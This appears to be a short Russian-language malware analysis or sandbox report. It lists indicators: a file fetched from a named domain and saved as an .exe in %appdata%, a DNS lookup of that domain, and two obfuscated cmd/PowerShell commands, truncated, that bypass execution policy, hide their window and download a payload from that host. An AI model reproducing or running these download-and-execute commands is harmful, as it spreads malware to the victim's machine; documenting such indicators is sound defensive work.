Техническая информация
- http://bestflowstou.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^We^RS^HEL^L.e^xE -exeC^UtiO^N^pO^LICY^ BYp^aS^S ^-^NO^P^roF^I^L^e -^Wi^nd^o^ws^T^y^Le ^HI^d^D^e^N (^New^-^ObJ^EcT ^SYSTeM.NeT.^wEbCLIENT)^.DowN^lOA^Dfile('http://bestflowst...
- DNS ASK be####owstou.wang
- '<SYSTEM32>\cmd.exe' /C "Po^We^RS^HEL^L.e^xE -exeC^UtiO^N^pO^LICY^ BYp^aS^S ^-^NO^P^roF^I^L^e -^Wi^nd^o^ws^T^y^Le ^HI^d^D^e^N (^New^-^ObJ^EcT ^SYSTeM.NeT.^wEbCLIENT)^.DowN^lOA^Dfile('http://bestflowst...' (со скрытым окном)